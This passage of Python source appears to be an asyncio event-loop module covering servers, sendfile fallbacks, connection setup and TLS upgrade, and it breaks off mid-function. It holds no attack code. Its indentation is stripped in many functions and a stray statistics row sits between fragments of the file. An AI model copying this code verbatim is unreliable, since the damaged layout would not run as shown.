if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
| 38.537528 | 83 | 0.568609 |
import collections
import collections.abc
import concurrent.futures
import heapq
import itertools
import logging
import os
import socket
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
from . import constants
from . import coroutines
from . import events
from . import futures
from . import protocols
from . import sslproto
from . import tasks
from . import transports
from .log import logger
__all__ = 'BaseEventLoop',
# Thresholds for compacting cancelled timers out of the _scheduled heap
# (presumably consumed by _run_once's cancelled-timer cleanup — the
# counterpart code lives outside this chunk; confirm).
_MIN_SCHEDULED_TIMER_HANDLES = 100
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Cap on the timeout handed to the selector in _run_once (24 hours);
# some selectors misbehave with huge/infinite timeouts.
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# *reuse_address* parameter
# Sentinel distinguishing "argument not passed" from an explicit None in
# create_datagram_endpoint(reuse_address=...).
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
    """Return a getaddrinfo()-style 5-tuple for *host*/*port* when *host*
    is already a numeric IP literal, else None (meaning: do a real DNS
    lookup).  Only TCP/UDP over SOCK_STREAM/SOCK_DGRAM are handled.
    """
    # Try to skip getaddrinfo if "host" is already an IP. Users might have
    # handled name resolution in their own code and pass in resolved IPs.
    if not hasattr(socket, 'inet_pton'):
        return
    if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
            host is None:
        return None
    # Pin the protocol from the socket type so the returned tuple is
    # fully specified.
    if type == socket.SOCK_STREAM:
        proto = socket.IPPROTO_TCP
    elif type == socket.SOCK_DGRAM:
        proto = socket.IPPROTO_UDP
    else:
        return None
    # Normalize "no port" spellings (None, b'', '') to 0.
    if port is None:
        port = 0
    elif isinstance(port, bytes) and port == b'':
        port = 0
    elif isinstance(port, str) and port == '':
        port = 0
    else:
        # If port's a service name like "http", don't skip getaddrinfo.
        try:
            port = int(port)
        except (TypeError, ValueError):
            return None
    # Candidate address families to try parsing the literal against.
    if family == socket.AF_UNSPEC:
        afs = [socket.AF_INET]
        if _HAS_IPv6:
            afs.append(socket.AF_INET6)
    else:
        afs = [family]
    if isinstance(host, bytes):
        host = host.decode('idna')
    if '%' in host:
        # Linux's inet_pton doesn't accept an IPv6 zone index after host,
        # like '::1%lo0'.
        return None
    for af in afs:
        try:
            socket.inet_pton(af, host)
            # The host has already been resolved.
            if _HAS_IPv6 and af == socket.AF_INET6:
                return af, type, proto, '', (host, port, flowinfo, scopeid)
            else:
                return af, type, proto, '', (host, port)
        except OSError:
            pass
    # "host" is not an IP address.
    return None
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, BaseException) and not isinstance(exc, Exception):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
# Platform-conditional helper: disable Nagle's algorithm on TCP sockets
# where the TCP_NODELAY option exists; otherwise a no-op with the same
# signature so callers never need to check.
if hasattr(socket, 'TCP_NODELAY'):
    def _set_nodelay(sock):
        # Only meaningful for TCP stream sockets; silently skip others.
        if (sock.family in {socket.AF_INET, socket.AF_INET6} and
                sock.type == socket.SOCK_STREAM and
                sock.proto == socket.IPPROTO_TCP):
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
    def _set_nodelay(sock):
        pass
class _SendfileFallbackProtocol(protocols.Protocol):
    """Temporary protocol installed on a transport during the user-space
    sendfile() fallback.

    On construction it takes over *transp*: reading is paused, the
    original protocol is stashed, and write flow-control is exposed via
    drain().  restore() puts everything back.
    """

    def __init__(self, transp):
        if not isinstance(transp, transports._FlowControlMixin):
            raise TypeError("transport should be _FlowControlMixin instance")
        self._transport = transp
        self._proto = transp.get_protocol()
        # Remember prior state so restore() can re-establish it exactly.
        self._should_resume_reading = transp.is_reading()
        self._should_resume_writing = transp._protocol_paused
        transp.pause_reading()
        transp.set_protocol(self)
        if self._should_resume_writing:
            # Writes were already throttled: start in the "waiting" state.
            self._write_ready_fut = self._transport._loop.create_future()
        else:
            self._write_ready_fut = None

    async def drain(self):
        """Block until the transport is ready to accept more data."""
        if self._transport.is_closing():
            raise ConnectionError("Connection closed by peer")
        fut = self._write_ready_fut
        if fut is None:
            return
        await fut

    def connection_made(self, transport):
        # The connection pre-exists by construction.
        raise RuntimeError("Invalid state: "
                           "connection should have been established already.")

    def connection_lost(self, exc):
        if self._write_ready_fut is not None:
            # Never happens if peer disconnects after sending the whole content
            # Thus disconnection is always an exception from user perspective
            if exc is None:
                self._write_ready_fut.set_exception(
                    ConnectionError("Connection is closed by peer"))
            else:
                self._write_ready_fut.set_exception(exc)
        # Forward the event to the real (stashed) protocol.
        self._proto.connection_lost(exc)

    def pause_writing(self):
        if self._write_ready_fut is not None:
            return
        self._write_ready_fut = self._transport._loop.create_future()

    def resume_writing(self):
        if self._write_ready_fut is None:
            return
        self._write_ready_fut.set_result(False)
        self._write_ready_fut = None

    def data_received(self, data):
        raise RuntimeError("Invalid state: reading should be paused")

    def eof_received(self):
        raise RuntimeError("Invalid state: reading should be paused")

    async def restore(self):
        """Reinstall the original protocol and prior read/write state."""
        self._transport.set_protocol(self._proto)
        if self._should_resume_reading:
            self._transport.resume_reading()
        if self._write_ready_fut is not None:
            # Cancel the future.
            # Basically it has no effect because protocol is switched back,
            # no code should wait for it anymore.
            self._write_ready_fut.cancel()
        if self._should_resume_writing:
            self._proto.resume_writing()
class Server(events.AbstractServer):
    """Listening-server object returned by loop.create_server().

    Tracks the listening sockets, an active-connection count, and waiters
    that wait_closed() parks until the last connection detaches.
    """

    def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
                 ssl_handshake_timeout):
        self._loop = loop
        self._sockets = sockets          # becomes None once close() is called
        self._active_count = 0           # number of attached connections
        self._waiters = []               # futures parked by wait_closed()
        self._protocol_factory = protocol_factory
        self._backlog = backlog
        self._ssl_context = ssl_context
        self._ssl_handshake_timeout = ssl_handshake_timeout
        self._serving = False
        self._serving_forever_fut = None

    def __repr__(self):
        return f'<{self.__class__.__name__} sockets={self.sockets!r}>'

    def _attach(self):
        # Called by the loop when a new connection is accepted.
        assert self._sockets is not None
        self._active_count += 1

    def _detach(self):
        # Called when a connection finishes; wakes wait_closed() waiters
        # once the server is closed and the last connection goes away.
        assert self._active_count > 0
        self._active_count -= 1
        if self._active_count == 0 and self._sockets is None:
            self._wakeup()

    def _wakeup(self):
        # Resolve every parked wait_closed() future exactly once.
        waiters = self._waiters
        self._waiters = None
        for waiter in waiters:
            if not waiter.done():
                waiter.set_result(waiter)

    def _start_serving(self):
        if self._serving:
            return
        self._serving = True
        for sock in self._sockets:
            sock.listen(self._backlog)
            self._loop._start_serving(
                self._protocol_factory, sock, self._ssl_context,
                self, self._backlog, self._ssl_handshake_timeout)

    def get_loop(self):
        return self._loop

    def is_serving(self):
        return self._serving

    @property
    def sockets(self):
        # Defensive copy; empty list after close().
        if self._sockets is None:
            return []
        return list(self._sockets)

    def close(self):
        """Stop listening.  Idempotent; also cancels serve_forever()."""
        sockets = self._sockets
        if sockets is None:
            return
        self._sockets = None
        for sock in sockets:
            self._loop._stop_serving(sock)
        self._serving = False
        if (self._serving_forever_fut is not None and
                not self._serving_forever_fut.done()):
            self._serving_forever_fut.cancel()
            self._serving_forever_fut = None
        if self._active_count == 0:
            self._wakeup()

    async def start_serving(self):
        self._start_serving()
        # Skip one loop iteration so that all 'loop.add_reader'
        # go through.
        await tasks.sleep(0, loop=self._loop)

    async def serve_forever(self):
        """Serve until cancelled; re-entrant calls are rejected."""
        if self._serving_forever_fut is not None:
            raise RuntimeError(
                f'server {self!r} is already being awaited on serve_forever()')
        if self._sockets is None:
            raise RuntimeError(f'server {self!r} is closed')
        self._start_serving()
        self._serving_forever_fut = self._loop.create_future()
        try:
            await self._serving_forever_fut
        except futures.CancelledError:
            try:
                self.close()
                await self.wait_closed()
            finally:
                raise
        finally:
            self._serving_forever_fut = None

    async def wait_closed(self):
        """Wait until close() completes and active connections drain."""
        if self._sockets is None or self._waiters is None:
            return
        waiter = self._loop.create_future()
        self._waiters.append(waiter)
        await waiter
class BaseEventLoop(events.AbstractEventLoop):
    def __init__(self):
        """Initialize all loop bookkeeping; the loop is created stopped."""
        self._timer_cancelled_count = 0
        self._closed = False
        self._stopping = False
        self._ready = collections.deque()   # callbacks due this iteration
        self._scheduled = []                # heap of TimerHandle objects
        self._default_executor = None
        self._internal_fds = 0
        # Identifier of the thread running the event loop, or None if the
        # event loop is not running
        self._thread_id = None
        self._clock_resolution = time.get_clock_info('monotonic').resolution
        self._exception_handler = None
        self.set_debug(coroutines._is_debug_mode())
        # In debug mode, if the execution of a callback or a step of a task
        # exceed this duration in seconds, the slow callback/task is logged.
        self.slow_callback_duration = 0.1
        self._current_handle = None
        self._task_factory = None
        self._coroutine_origin_tracking_enabled = False
        self._coroutine_origin_tracking_saved_depth = None
        # A weak set of all asynchronous generators that are
        # being iterated by the loop.
        self._asyncgens = weakref.WeakSet()
        # Set to True when `loop.shutdown_asyncgens` is called.
        self._asyncgens_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
    def create_future(self):
        """Create and return a new Future object attached to this loop."""
        return futures.Future(loop=self)
def create_task(self, coro):
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
return task
def set_task_factory(self, factory):
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
    def get_task_factory(self):
        """Return the current task factory, or None if the default is in use."""
        return self._task_factory
    def _make_socket_transport(self, sock, protocol, waiter=None, *,
                               extra=None, server=None):
        """Create a socket transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _make_ssl_transport(
            self, rawsock, protocol, sslcontext, waiter=None,
            *, server_side=False, server_hostname=None,
            extra=None, server=None,
            ssl_handshake_timeout=None,
            call_connection_made=True):
        """Create an SSL transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _make_datagram_transport(self, sock, protocol,
                                 address=None, waiter=None, extra=None):
        """Create a datagram transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
                                  extra=None):
        """Create a read-pipe transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
                                   extra=None):
        """Create a write-pipe transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    async def _make_subprocess_transport(self, protocol, args, shell,
                                         stdin, stdout, stderr, bufsize,
                                         extra=None, **kwargs):
        """Create a subprocess transport; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _write_to_self(self):
        """Wake the loop from another thread; provided by subclasses."""
        raise NotImplementedError
    def _process_events(self, event_list):
        """Dispatch selector events; provided by concrete loop subclasses."""
        raise NotImplementedError
    def _check_closed(self):
        """Raise RuntimeError if close() has already been called."""
        if self._closed:
            raise RuntimeError('Event loop is closed')
    def _asyncgen_finalizer_hook(self, agen):
        """sys.set_asyncgen_hooks finalizer: schedule agen.aclose() on the loop."""
        self._asyncgens.discard(agen)
        if not self.is_closed():
            # May fire from GC on another thread, hence threadsafe.
            self.call_soon_threadsafe(self.create_task, agen.aclose())
    def _asyncgen_firstiter_hook(self, agen):
        """sys.set_asyncgen_hooks firstiter: track *agen* for shutdown."""
        if self._asyncgens_shutdown_called:
            warnings.warn(
                f"asynchronous generator {agen!r} was scheduled after "
                f"loop.shutdown_asyncgens() call",
                ResourceWarning, source=self)
        self._asyncgens.add(agen)
    async def shutdown_asyncgens(self):
        """Close all asynchronous generators currently tracked by the loop.

        Errors raised while closing are reported through the loop's
        exception handler rather than propagated.
        """
        self._asyncgens_shutdown_called = True
        if not len(self._asyncgens):
            # If Python version is <3.6 or we don't have any asynchronous
            # generators alive, there is nothing to close.
            return
        closing_agens = list(self._asyncgens)
        self._asyncgens.clear()
        results = await tasks.gather(
            *[ag.aclose() for ag in closing_agens],
            return_exceptions=True,
            loop=self)
        for result, agen in zip(results, closing_agens):
            if isinstance(result, Exception):
                self.call_exception_handler({
                    'message': f'an error occurred during closing of '
                               f'asynchronous generator {agen!r}',
                    'exception': result,
                    'asyncgen': agen
                })
    def _check_runnung(self):
        """Raise RuntimeError when this loop, or any loop on this thread,
        is already running.

        NOTE(review): the misspelled name ("runnung") is kept on purpose —
        run_forever() and run_until_complete() call it by this name.
        """
        if self.is_running():
            raise RuntimeError('This event loop is already running')
        if events._get_running_loop() is not None:
            raise RuntimeError(
                'Cannot run the event loop while another loop is running')
    def run_forever(self):
        """Run the event loop until stop() is called.

        Installs this loop as the running loop for the current thread and
        registers the asyncgen hooks; everything is restored in the
        finally block, in reverse order of setup.
        """
        self._check_closed()
        self._check_runnung()
        self._set_coroutine_origin_tracking(self._debug)
        self._thread_id = threading.get_ident()
        old_agen_hooks = sys.get_asyncgen_hooks()
        sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
                               finalizer=self._asyncgen_finalizer_hook)
        try:
            events._set_running_loop(self)
            while True:
                self._run_once()
                if self._stopping:
                    break
        finally:
            self._stopping = False
            self._thread_id = None
            events._set_running_loop(None)
            self._set_coroutine_origin_tracking(False)
            sys.set_asyncgen_hooks(*old_agen_hooks)
    def run_until_complete(self, future):
        """Run the loop until *future* (coroutine or Future) completes and
        return its result; re-raise its exception on failure.
        """
        self._check_closed()
        self._check_runnung()
        new_task = not futures.isfuture(future)
        future = tasks.ensure_future(future, loop=self)
        if new_task:
            # An exception is raised below if the future didn't complete,
            # so there is no need to log the "destroy pending task" message
            future._log_destroy_pending = False
        future.add_done_callback(_run_until_complete_cb)
        try:
            self.run_forever()
        except:
            if new_task and future.done() and not future.cancelled():
                # The coroutine raised a BaseException. Consume the exception
                # to not log a warning, the caller doesn't have access to the
                # local task.
                future.exception()
            raise
        finally:
            future.remove_done_callback(_run_until_complete_cb)
        if not future.done():
            raise RuntimeError('Event loop stopped before Future completed.')
        return future.result()
    def stop(self):
        """Request run_forever() to exit after the current iteration."""
        self._stopping = True
    def close(self):
        """Close the event loop.

        The loop must not be running.  Pending callbacks are discarded and
        the default executor is shut down without waiting.  Idempotent.
        """
        if self.is_running():
            raise RuntimeError("Cannot close a running event loop")
        if self._closed:
            return
        if self._debug:
            logger.debug("Close %r", self)
        self._closed = True
        self._ready.clear()
        self._scheduled.clear()
        executor = self._default_executor
        if executor is not None:
            self._default_executor = None
            executor.shutdown(wait=False)
    def is_closed(self):
        """Return True if close() has been called."""
        return self._closed
    def __del__(self):
        """Warn about, and best-effort close, a garbage-collected open loop."""
        if not self.is_closed():
            warnings.warn(f"unclosed event loop {self!r}", ResourceWarning,
                          source=self)
            if not self.is_running():
                self.close()
    def is_running(self):
        """Return True while run_forever()/run_until_complete() is active."""
        return (self._thread_id is not None)
    def time(self):
        """Return the loop's monotonic clock, in seconds (float)."""
        return time.monotonic()
    def call_later(self, delay, callback, *args, context=None):
        """Schedule callback(*args) to run after *delay* seconds.

        Returns the TimerHandle, which can be used to cancel the call.
        """
        timer = self.call_at(self.time() + delay, callback, *args,
                             context=context)
        if timer._source_traceback:
            # Hide the call_later() frame itself from debug tracebacks.
            del timer._source_traceback[-1]
        return timer
    def call_at(self, when, callback, *args, context=None):
        """Schedule callback(*args) at absolute loop time *when*.

        Returns a TimerHandle pushed onto the _scheduled heap.
        """
        self._check_closed()
        if self._debug:
            self._check_thread()
            self._check_callback(callback, 'call_at')
        timer = events.TimerHandle(when, callback, args, self, context)
        if timer._source_traceback:
            del timer._source_traceback[-1]
        heapq.heappush(self._scheduled, timer)
        timer._scheduled = True
        return timer
    def call_soon(self, callback, *args, context=None):
        """Queue callback(*args) to run on the next loop iteration.

        Not thread-safe; use call_soon_threadsafe() from other threads.
        Returns a Handle usable for cancellation.
        """
        self._check_closed()
        if self._debug:
            self._check_thread()
            self._check_callback(callback, 'call_soon')
        handle = self._call_soon(callback, args, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
    def _call_soon(self, callback, args, context):
        """Append a Handle for callback(*args) to the ready queue (no checks)."""
        handle = events.Handle(callback, args, self, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        self._ready.append(handle)
        return handle
def _check_thread(self):
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
    def call_soon_threadsafe(self, callback, *args, context=None):
        """Like call_soon(), but safe to call from another thread.

        Writes to the self-pipe so a blocked selector wakes up.
        """
        self._check_closed()
        if self._debug:
            self._check_callback(callback, 'call_soon_threadsafe')
        handle = self._call_soon(callback, args, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        self._write_to_self()
        return handle
    def run_in_executor(self, executor, func, *args):
        """Run func(*args) in *executor* and return an asyncio Future.

        When *executor* is None, a default ThreadPoolExecutor is created
        lazily and reused for subsequent calls.
        """
        self._check_closed()
        if self._debug:
            self._check_callback(func, 'run_in_executor')
        if executor is None:
            executor = self._default_executor
            if executor is None:
                executor = concurrent.futures.ThreadPoolExecutor()
                self._default_executor = executor
        return futures.wrap_future(
            executor.submit(func, *args), loop=self)
    def set_default_executor(self, executor):
        """Set the executor used by run_in_executor(executor=None)."""
        self._default_executor = executor
    def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
        """Debug-mode wrapper for socket.getaddrinfo that logs the call
        and its duration (INFO if it exceeds slow_callback_duration).
        """
        msg = [f"{host}:{port!r}"]
        if family:
            msg.append(f'family={family!r}')
        if type:
            msg.append(f'type={type!r}')
        if proto:
            msg.append(f'proto={proto!r}')
        if flags:
            msg.append(f'flags={flags!r}')
        msg = ', '.join(msg)
        logger.debug('Get address info %s', msg)
        t0 = self.time()
        addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
        dt = self.time() - t0
        msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
        if dt >= self.slow_callback_duration:
            logger.info(msg)
        else:
            logger.debug(msg)
        return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
    async def getnameinfo(self, sockaddr, flags=0):
        """Run socket.getnameinfo(sockaddr, flags) in the default executor."""
        return await self.run_in_executor(
            None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
raise events.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
    async def _sock_sendfile_fallback(self, sock, file, offset, count):
        """User-space sendfile: read *file* in an executor, sock_sendall
        each chunk.  Returns the number of bytes sent; on exit the file
        position is advanced by exactly that amount (if seekable).
        """
        if offset:
            file.seek(offset)
        blocksize = (
            min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
            if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
        )
        buf = bytearray(blocksize)
        total_sent = 0
        try:
            while True:
                if count:
                    # Never send more than *count* bytes in total.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        break
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    break  # EOF
                await self.sock_sendall(sock, view[:read])
                total_sent += read
            return total_sent
        finally:
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
    def _check_sendfile_params(self, sock, file, offset, count):
        """Validate sock_sendfile() arguments.

        *file* must be binary (objects without a ``mode`` attribute pass),
        *sock* must be SOCK_STREAM, *count* a positive int or None, and
        *offset* a non-negative int.
        """
        if 'b' not in getattr(file, 'mode', 'b'):
            raise ValueError("file should be opened in binary mode")
        if not sock.type == socket.SOCK_STREAM:
            raise ValueError("only SOCK_STREAM type sockets are supported")
        if count is not None:
            if not isinstance(count, int):
                raise TypeError(
                    "count must be a positive integer (got {!r})".format(count))
            if count <= 0:
                raise ValueError(
                    "count must be a positive integer (got {!r})".format(count))
        if not isinstance(offset, int):
            raise TypeError(
                "offset must be a non-negative integer (got {!r})".format(
                    offset))
        if offset < 0:
            raise ValueError(
                "offset must be a non-negative integer (got {!r})".format(
                    offset))
    async def create_connection(
            self, protocol_factory, host=None, port=None,
            *, ssl=None, family=0,
            proto=0, flags=0, sock=None,
            local_addr=None, server_hostname=None,
            ssl_handshake_timeout=None):
        """Connect to host/port (or use a pre-connected *sock*) and return
        (transport, protocol).

        With host/port, each resolved address is tried in turn; errors are
        collected and re-raised (combined) only if every attempt fails.
        """
        if server_hostname is not None and not ssl:
            raise ValueError('server_hostname is only meaningful with ssl')
        if server_hostname is None and ssl:
            # Use host as default for server_hostname.  It is an error
            # if host is empty or not set, e.g. when an
            # already-connected socket was passed or when only a port
            # is given.
            if not host:
                raise ValueError('You must set server_hostname '
                                 'when using ssl without a host')
            server_hostname = host
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            infos = await self._ensure_resolved(
                (host, port), family=family,
                type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
            if not infos:
                raise OSError('getaddrinfo() returned empty list')
            if local_addr is not None:
                laddr_infos = await self._ensure_resolved(
                    local_addr, family=family,
                    type=socket.SOCK_STREAM, proto=proto,
                    flags=flags, loop=self)
                if not laddr_infos:
                    raise OSError('getaddrinfo() returned empty list')
            exceptions = []
            for family, type, proto, cname, address in infos:
                try:
                    sock = socket.socket(family=family, type=type, proto=proto)
                    sock.setblocking(False)
                    if local_addr is not None:
                        # Try binding to each resolved local address.
                        for _, _, _, _, laddr in laddr_infos:
                            try:
                                sock.bind(laddr)
                                break
                            except OSError as exc:
                                msg = (
                                    f'error while attempting to bind on '
                                    f'address {laddr!r}: '
                                    f'{exc.strerror.lower()}'
                                )
                                exc = OSError(exc.errno, msg)
                                exceptions.append(exc)
                        else:
                            # No local address bound: try next remote address.
                            sock.close()
                            sock = None
                            continue
                    if self._debug:
                        logger.debug("connect %r to %r", sock, address)
                    await self.sock_connect(sock, address)
                except OSError as exc:
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                # All attempts failed.
                if len(exceptions) == 1:
                    raise exceptions[0]
                else:
                    # If they all have the same str(), raise one.
                    model = str(exceptions[0])
                    if all(str(exc) == model for exc in exceptions):
                        raise exceptions[0]
                    # Raise a combined exception so the user can see all
                    # the various error messages.
                    raise OSError('Multiple exceptions: {}'.format(
                        ', '.join(str(exc) for exc in exceptions)))
        else:
            if sock is None:
                raise ValueError(
                    'host and port was not specified and no sock specified')
            if sock.type != socket.SOCK_STREAM:
                # We allow AF_INET, AF_INET6, AF_UNIX as long as they
                # are SOCK_STREAM.
                # We support passing AF_UNIX sockets even though we have
                # a dedicated API for that: create_unix_connection.
                # Disallowing AF_UNIX in this method, breaks backwards
                # compatibility.
                raise ValueError(
                    f'A Stream Socket was expected, got {sock!r}')
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r connected to %s:%r: (%r, %r)",
                         sock, host, port, transport, protocol)
        return transport, protocol
    async def _create_connection_transport(
            self, sock, protocol_factory, ssl,
            server_hostname, server_side=False,
            ssl_handshake_timeout=None):
        """Wrap a connected *sock* in a (possibly SSL) transport and wait
        for the protocol's connection_made via *waiter*.
        """
        sock.setblocking(False)
        protocol = protocol_factory()
        waiter = self.create_future()
        if ssl:
            # ssl=True means "use a default context".
            sslcontext = None if isinstance(ssl, bool) else ssl
            transport = self._make_ssl_transport(
                sock, protocol, sslcontext, waiter,
                server_side=server_side, server_hostname=server_hostname,
                ssl_handshake_timeout=ssl_handshake_timeout)
        else:
            transport = self._make_socket_transport(sock, protocol, waiter)
        try:
            await waiter
        except:
            transport.close()
            raise
        return transport, protocol
    async def sendfile(self, transport, file, offset=0, count=None,
                       *, fallback=True):
        """Send *file* over *transport*; return the number of bytes sent.

        The transport advertises its capability via _sendfile_compatible;
        TRY_NATIVE attempts the os.sendfile path first, then (if allowed)
        falls back to a user-space copy loop.
        """
        if transport.is_closing():
            raise RuntimeError("Transport is closing")
        mode = getattr(transport, '_sendfile_compatible',
                       constants._SendfileMode.UNSUPPORTED)
        if mode is constants._SendfileMode.UNSUPPORTED:
            raise RuntimeError(
                f"sendfile is not supported for transport {transport!r}")
        if mode is constants._SendfileMode.TRY_NATIVE:
            try:
                return await self._sendfile_native(transport, file,
                                                   offset, count)
            except events.SendfileNotAvailableError as exc:
                if not fallback:
                    raise
        if not fallback:
            raise RuntimeError(
                f"fallback is disabled and native sendfile is not "
                f"supported for transport {transport!r}")
        return await self._sendfile_fallback(transport, file,
                                             offset, count)
    async def _sendfile_native(self, transp, file, offset, count):
        """Base implementation: no native sendfile; subclasses override."""
        raise events.SendfileNotAvailableError(
            "sendfile syscall is not supported")
    async def _sendfile_fallback(self, transp, file, offset, count):
        """User-space sendfile over a transport: read in an executor,
        write through a temporary flow-controlled protocol (drain between
        writes).  The original protocol is restored in the finally block.
        """
        if offset:
            file.seek(offset)
        blocksize = min(count, 16384) if count else 16384
        buf = bytearray(blocksize)
        total_sent = 0
        proto = _SendfileFallbackProtocol(transp)
        try:
            while True:
                if count:
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        return total_sent
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    return total_sent  # EOF
                await proto.drain()
                transp.write(view[:read])
                total_sent += read
        finally:
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
            await proto.restore()
    async def start_tls(self, transport, protocol, sslcontext, *,
                        server_side=False,
                        server_hostname=None,
                        ssl_handshake_timeout=None):
        """Upgrade an established *transport* to TLS in place.

        Returns the new SSL application transport; the old transport is
        closed on handshake failure.
        """
        if ssl is None:
            raise RuntimeError('Python ssl module is not available')
        if not isinstance(sslcontext, ssl.SSLContext):
            raise TypeError(
                f'sslcontext is expected to be an instance of ssl.SSLContext, '
                f'got {sslcontext!r}')
        if not getattr(transport, '_start_tls_compatible', False):
            raise TypeError(
                f'transport {transport!r} is not supported by start_tls()')
        waiter = self.create_future()
        ssl_protocol = sslproto.SSLProtocol(
            self, protocol, sslcontext, waiter,
            server_side, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout,
            call_connection_made=False)
        # Pause early so that "ssl_protocol.data_received()" doesn't
        # get called before "ssl_protocol.connection_made()".
        transport.pause_reading()
        transport.set_protocol(ssl_protocol)
        conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
        resume_cb = self.call_soon(transport.resume_reading)
        try:
            await waiter
        except Exception:
            # Cancel the pending callbacks so they don't run against a
            # closed transport.
            transport.close()
            conmade_cb.cancel()
            resume_cb.cancel()
            raise
        return ssl_protocol._app_transport
    async def create_datagram_endpoint(self, protocol_factory,
                                       local_addr=None, remote_addr=None, *,
                                       family=0, proto=0, flags=0,
                                       reuse_address=_unset, reuse_port=None,
                                       allow_broadcast=None, sock=None):
        """Create a UDP endpoint; return (transport, protocol).

        Either a pre-made *sock* is used (no other socket options allowed),
        or sockets are created for each resolved (family, proto) pair of
        local/remote addresses until one succeeds.  reuse_address=True is
        rejected for security (bpo-37228).
        """
        if sock is not None:
            if sock.type != socket.SOCK_DGRAM:
                raise ValueError(
                    f'A UDP Socket was expected, got {sock!r}')
            if (local_addr or remote_addr or
                    family or proto or flags or
